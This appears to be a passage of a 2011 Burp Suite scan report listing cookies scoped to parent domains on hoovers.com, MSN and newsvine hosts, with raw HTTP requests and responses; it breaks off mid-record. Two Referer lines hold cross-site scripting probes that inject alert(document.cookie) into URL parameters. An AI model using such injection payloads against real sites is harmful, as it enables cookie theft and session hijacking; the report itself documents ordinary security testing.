GET /w/tre?ad_id=23189;evt=16009;cat1=19307;cat2=19308;rand=85918057 HTTP/1.1 Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|11008:274624:511498:54393:0:1296265712:0|; pjw=BBgAAAACIAMDVnFDTSAGAQABIAMCOSsEYAcCvMkHIA2AEwBT4AIfBDzSAwAFIBcB+hHgAR8AUOACHwHrHIA/ASuq4AEfAE3gAh8BZi6AHwDU4AJfAErgAh8BBjqAHwEI5OABPwBH4AIfASQwgB8BFc3gAR8AROACHwGgN4AfAfXg4AEfAEHgAh8B5i+AHwBf4AI/AD7gAh8CYEUEYRMB/ffgAT8AN+ACHwBfoB8A/OACHwAw4AIfBE5HBAADIR8B6PvgAT8AHeACHwBQID9BZwDX4AI/ABfgAh8BtCmAHwHkwOABPwFBd+EBnwKP6AJgPwEzykGFIS8gAwDw4AI/AMChHwEKzoA/QB8AZOACHwGRQYBfAe7y4AEfAGHgAh8AYyCfQhMBAPjgAR8AW+ACHwBkoB8AAeACHwBY4AIfAIKgXwH78OABPwBR4AIfBCTpAwAKIF4Ax+ACH+ED/wAeoL8AFKGfQL8AP+ACPwBAon8A/qJ/QB8AIOACHwEpP4DfAQ7t4AF/ABjgAh8BYkOAHwFx9cAfAQAA; adv_ic=ByAAAABBd0NNIAYGAAFJAAC2USAHIAtAAAHwceABFwH6XeABFwE+cqAXBEMAAPxI4AEXAGTgAi8Bq17gARfgAy8AaOACFwBh4AIvAZlQ4AEvAD3gAl8AsOACLwBY4AIv4ANH4AMvAeFZ4AFHAFbgAi8A5CDbwNfgAy8BAlvgARcAUOACLwSLXAAABEEEIAACHrNAgR8g7wCpIO8AYCATQAAATeACLwDVIC8AAkAUIAACvQ0/4AAvABsgjwB2IBNAAABL4AIvAdtX4AF3AErgAhcAGuACpwBB4AIXAD/hAgcAIOACFwB54AK/AB3gAhcAxeACLwAY4AIX4QNP4AMXAWU44AGPAVzVoO8giwBk4AIXAIvA1yAXBM1PAAADQNQgAABV4AIXAUdT4AFHACbgAhcAD+ACjwAD4AIXABjgAhcB/gyhNyBfAbda4AFHANzgAhcAxuACFwDY4AIXACjgAkcAxOACFwAV4AIXAKvgAhcBeUfAXwEAAA==; pluto=517004695355|v1
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: metrics.hoovers.com Proxy-Connection: keep-alive Referer: http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5%22%3balert(document.cookie)//4d5eca5bcd1=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HID=10.1.1.227.122391296352471936; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:54:49 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/ Location: http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&pccr=true&vidn=26A26274851D2CD5-60000130C044F459&&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 01:54:49 GMT Last-Modified: Mon, 31 Jan 2011 01:54:49 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www334 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: michaelwann.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:08:31 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=0c7ec67e6546a0d27335d16adf1ea700; expires=Sat, 25-Jan-2031 02:08:31 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auto-insurance/article.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=c08717139d004559bd4f0225c985624e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM06 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:48:12 GMT Content-Length: 136393
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=4d8ce924396e4151b191c200b28be405; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM07 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:47:59 GMT Content-Length: 81669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /currency/currency-clash-dollar-vs-euro-smartmoney.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=a96ec68b7d3a41e88ae91566940da75a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM08 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:47:57 GMT Content-Length: 70397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /identity-theft/default-dyn.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=8a19b1c37abe4adaa07e1fe54f2a83e1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM05 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:48:03 GMT Content-Length: 52097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /market-news/post.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=fc74895a2afe4dbb8b81357837158fa3; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM05 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:47:56 GMT Content-Length: 43288
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mutual-fund/default-dyn.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=78fc912bcfc74a00b174e74deda213d4; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM08 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:47:57 GMT Content-Length: 60626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /saving-money/50-30-20-budget.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=4d2c950ddf854b40a5add97ca57f1813; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM07 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:48:06 GMT Content-Length: 33106
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Sat, 29 Jan 2011 23:48:16 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET pragma: no-cache Location: http://moneycentral.msn.com/home.asp Content-Length: 157 Content-Type: text/html Set-Cookie: MUID=74239CED20224902AC862552C566F9F3; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /detail/stock_quote HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Sat, 29 Jan 2011 23:48:21 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://investing.money.redacted/investments/stock-price Set-Cookie: MUID=f1e153930f7d43c7a9fd16af4cdded3a; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:21 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/Attributions.asp HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:48:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Length: 26240 Content-Type: text/html Expires: Sat, 29 Jan 2011 23:48:25 GMT Set-Cookie: MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head> <tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal-finance/ HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 29 Jan 2011 23:48:20 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://money.redacted/personal-finance/ Set-Cookie: MUID=eeb0f31a74744b6db817f50168fe01ae; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:20 GMT; path=/ Cache-Control: private Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 88675 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=8a183991ad5843ecb33290e9ed7a7542; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> MSN Movies ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /academy-awards/snubs/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 43284 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=315a7361d2a9433cbd6de273a6f46301; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jason-statham/photo-gallery/feature/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 38350 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=bd071d931c99456bbb919ea6d508c2bf; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> A Beginner ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mom-pop-culture/tiger-mom-movie/story-feature/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 48526 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=edacaf4cfdd14387b49aebcecaca1296; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Mom & ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /new-on-dvd/movies/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 48135 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=644af2bf6b11442a9276943bf18262ae; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Movies New ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 49419 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Parallel U ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 52719 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Parallel U ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /showtimes/showtimes.aspx HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /the-rundown/the-guard/story_5/ HTTP/1.1 Host: movies.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 65403 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=423319e9829a41ada11054b6866c7b97; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:48:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> MSN Movies ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /en-us/ Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Set-Cookie: A=I&I=AxUFAAAAAAD6BwAA2FAL8QpHJ6ENcoug1+VHkA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:23:48 GMT; path=/; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:23:50 GMT Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/en-us/">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
